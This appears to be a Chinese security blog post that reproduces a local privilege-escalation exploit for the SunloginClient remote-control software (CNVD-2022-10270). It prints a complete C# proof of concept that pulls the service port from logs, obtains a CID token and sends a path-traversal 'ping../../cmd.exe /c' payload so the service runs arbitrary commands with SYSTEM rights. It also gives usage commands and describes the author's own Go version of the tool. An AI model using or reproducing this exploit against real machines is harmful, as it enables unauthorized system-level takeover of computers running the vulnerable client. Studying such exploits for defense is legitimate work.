向日葵RCE后续利用之本地提权
根据玄武实验室的文章和 https://github.com/Ryze-T/CNVD-2022-10270-LPE 的 PoC，先找到目标日志文件：
cd /d c:/
dir /S sunlogin_service*
（递归搜索整个 C 盘，定位向日葵日志文件，例如：）
sunlogin_service.20220226-171345.log
复现
安装 .NET 4：
https://www.microsoft.com/zh-cn/download/details.aspx?id=17718
运行时发现需要指定向日葵的安装路径，而我在 Win7 下的目录为
C:\ProgramData\Oray\SunloginClient\log，和默认路径不同，所以需要自己指定（注意传参时不带末尾的 log：程序会自行在该路径后拼接 \log）
sunloginLPE.exe whoami C:\ProgramData\Oray\SunloginClient
代码分析
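using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Text.RegularExpressions;
using System.Net;

namespace sunloginLPE
{
    /// <summary>
    /// Local privilege escalation PoC for the SunloginClient local service (CNVD-2022-10270 per the article).
    /// Flow: find the newest sunlogin_service.*.log, pull the service's local listener port out of it,
    /// obtain a CID (the "verify_string" returned by /cgi-bin/rpc?action=verify-haras), then call /check
    /// with a path-traversal "cmd=ping../../..cmd.exe /c ..." payload that the service executes with its
    /// own privileges. Every request targets 127.0.0.1. Authorized testing only.
    /// </summary>
    internal class Program
    {
        /// <summary>
        /// Returns the full path of the first file whose name contains "sunlogin_service." among the
        /// <paramref name="count"/> most recently created files in <paramref name="directory"/>,
        /// or "" (after printing a notice) when none of them matches or the directory is missing.
        /// Heuristic kept from the original: only the newest <paramref name="count"/> files are inspected,
        /// so a directory where other log types were created more recently yields "".
        /// </summary>
        static string GetLatestFiles(string directory, int count)
        {
            // Directory.GetFiles throws on a missing directory; a clear message is more useful to the
            // operator than the raw exception text that Main would otherwise print.
            if (!Directory.Exists(directory))
            {
                Console.WriteLine("[-] log directory not found: " + directory);
                return "";
            }

            string[] newest = Directory.GetFiles(directory)
                .Select(f => new FileInfo(f))
                .OrderByDescending(fi => fi.CreationTime)
                .Select(fi => fi.FullName)
                .Take(count)
                .ToArray();

            foreach (string candidate in newest)
            {
                if (candidate.Contains("sunlogin_service."))
                {
                    return candidate;
                }
            }

            Console.WriteLine("[-] logFile not found");
            return "";
        }

        /// <summary>
        /// Extracts the SunloginClient local HTTP port from the newest service log under
        /// <paramref name="path"/>\log. Returns "" when no log file or no "start listen OK" line is found.
        /// </summary>
        static string getPort(string path)
        {
            // The install directory is passed without the trailing "log" segment; it is appended here.
            string logFile = GetLatestFiles(Path.Combine(path, "log"), 2);
            if (logFile == "")
            {
                return "";
            }

            string content;
            // FileShare.ReadWrite: the service keeps the log open for writing, an exclusive open would fail.
            // The using-blocks fix the original's leaked FileStream/StreamReader handles.
            using (FileStream fs = new FileStream(logFile, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
            using (StreamReader sr = new StreamReader(fs, Encoding.Default))
            {
                content = sr.ReadToEnd();
            }

            // The last "start listen OK...," fragment wins: after a service restart the most recent
            // listener is the live one.
            string listenFragment = LastMatch(content, @"\bstart listen OK\S*\,");
            // Assumes the port has exactly five digits, as in the article's log sample; a listener on a
            // four-digit port would not be detected - TODO confirm against the real log format.
            return LastMatch(listenFragment, @"\d{5}");
        }

        /// <summary>Value of the last match of <paramref name="pattern"/> in <paramref name="input"/>, or "".</summary>
        private static string LastMatch(string input, string pattern)
        {
            string last = "";
            foreach (Match m in Regex.Matches(input, pattern))
            {
                last = m.Value;
            }
            return last;
        }

        /// <summary>
        /// Performs GET <paramref name="url"/>?<paramref name="requestData"/> and returns the response body
        /// decoded with Encoding.Default. When <paramref name="cookie"/> is non-null a "Cookie: CID=..." header
        /// is attached. Throws WebException on a non-success HTTP status (propagated to Main's catch).
        /// </summary>
        private static string HttpGet(string url, string requestData, string cookie)
        {
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);
            request.Method = "GET";
            // Kept from the original even though a GET carries no body; harmless for this target.
            request.ContentType = "text/html; charset=UTF-8";
            if (cookie != null)
            {
                request.Headers.Add("Cookie", "CID=" + cookie);
            }

            // Dispose response, stream and reader (the original closed the reader but never the response).
            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            using (Stream responseStream = response.GetResponseStream())
            using (StreamReader reader = new StreamReader(responseStream, Encoding.Default))
            {
                return reader.ReadToEnd();
            }
        }

        /// <summary>GET without a cookie; thin wrapper kept for the original call sites.</summary>
        private static String HttpGet(string url, string requestData)
        {
            return HttpGet(url, requestData, null);
        }

        /// <summary>GET with "Cookie: CID=&lt;cookie&gt;"; thin wrapper kept for the original call sites.</summary>
        private static String HttpGetWithCookie(string url, string requestData, string cookie)
        {
            return HttpGet(url, requestData, cookie);
        }

        /// <summary>
        /// Runs <paramref name="ExecCmd"/> through the SunloginClient service listening on
        /// 127.0.0.1:<paramref name="SunloginClient_port"/> and returns the raw response body.
        /// Step 1: GET /cgi-bin/rpc?action=verify-haras returns a body containing "verify_string":"..."; that
        /// value is the CID. Step 2: GET /check?cmd=ping../../..windows\system32\cmd.exe+/c+CMD with the CID
        /// cookie - the ping handler's path traversal makes the service spawn cmd.exe with its own privileges.
        /// </summary>
        static string exp(string SunloginClient_port, string ExecCmd)
        {
            string baseUrl = "http://127.0.0.1:" + SunloginClient_port;

            string rpcResponse = HttpGet(baseUrl + "/cgi-bin/rpc", "action=verify-haras");
            // Capture group 1 is the token itself (same result as the original's quote/prefix stripping);
            // the last match wins, as before.
            string cid = "";
            foreach (Match m in Regex.Matches(rpcResponse, "verify_string\":\"(\\w+)?\""))
            {
                cid = m.Groups[1].Value;
            }
            Console.WriteLine("[+] CID=" + cid);

            // Only spaces are rewritten to '+'; the command is not URL-encoded, so a command containing
            // '&', '%', '#' or '+' will be mangled by the CGI parser (original behaviour, kept).
            string payload = "cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows\\system32\\cmd.exe+/c+"
                + ExecCmd.Replace(" ", "+");
            return HttpGetWithCookie(baseUrl + "/check", payload, cid);
        }

        /// <summary>
        /// Entry point. Usage: sunloginLPE.exe Cmd [sunloginClientPath]
        /// The optional second argument is the client install directory WITHOUT the trailing \log
        /// (it is appended by getPort); it defaults to the standard install path.
        /// Exits with code 1 on bad arguments, when the service port cannot be determined, or on any exception
        /// (the original exited 0 on these paths, which hid failures from calling scripts).
        /// </summary>
        static void Main(string[] args)
        {
            Console.WriteLine("[!] Usage: sunloginLPE.exe Cmd [sunloginClientPath](DefaultPath = C:\\Program Files\\Oray\\SunLogin\\SunloginClient)");
            string defaultPath = "C:\\Program Files\\Oray\\SunLogin\\SunloginClient";

            if (args.Length != 1 && args.Length != 2)
            {
                Console.WriteLine("[-] wrong number of parameters");
                Environment.Exit(1);
            }
            string cmd = args[0];
            string path = args.Length == 2 ? args[1] : defaultPath;

            try
            {
                string port = getPort(path);
                if (port == "")
                {
                    Console.WriteLine("[-] SunloginClient port not found");
                    Environment.Exit(1);
                }
                Console.WriteLine("[+] SunloginClient port is " + port);
                Console.WriteLine("[+] 命令执行结果: \n" + exp(port, cmd));
            }
            catch (Exception ex)
            {
                Console.WriteLine("[-] " + ex.ToString());
                Environment.Exit(1);
            }
        }
    }
}
// Article note: Main hard-codes defaultPath (line 111 of the original listing); when the install
// directory differs, it has to be supplied as the second argument.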
string defaultPath = "C:\\Program Files\\Oray\\SunLogin\\SunloginClient";
所以程序其实只自动化了漏洞利用这一块，目录如果不是默认值还是需要自己查询。
- 猜测应该是因为直接自动化全盘查找文件可能会被杀毒软件拦截、需要做免杀，通用性不高，所以作者没有写这一步。
Go 程序编写
所以自己用 Go 写一个一条龙（查进程、找日志、取端口、执行命令）的工具（但是不免杀！）
-
首先确定程序功能：
- 查找进程，查看本地是否存在向日葵进程（这里不确定各版本的进程名是否一致）
- 寻找日志文件，从中提取出服务的本地监听端口
- 通过该端口在本地调用接口执行命令，达到提权
-
确认传参：
- 要执行的 cmd 命令
最后效果
总的来说：
-
首先通过获取进程列表来确定本地是否存在向日葵进程
-
如果存在，就通过批处理命令（dir /S）自动化寻找日志文件
-
然后第二步获取最新的日志文件
- 上面的 C# 程序直接调用 Directory.GetFiles，按文件创建时间排序来取最新的日志
- 而我是基于上一步批处理找到的日志文件列表，通过比对得出最新的一个
-
后续的凭证（verify_string / CID）获取和命令执行与上面的程序一样
代码也放在了 GitHub，对于 Go 来说我还是初学者，所以可能写得不是很好（尤其异常处理这一块还需要完善）
https://github.com/liangyueliangyue/sunlogin_rce
后记
因為是基于文件讀取的前提進行命令執(zhí)行,然后向日葵運行是在系統(tǒng)管理員權(quán)限,所以可以用來進行本地提權(quán)
总结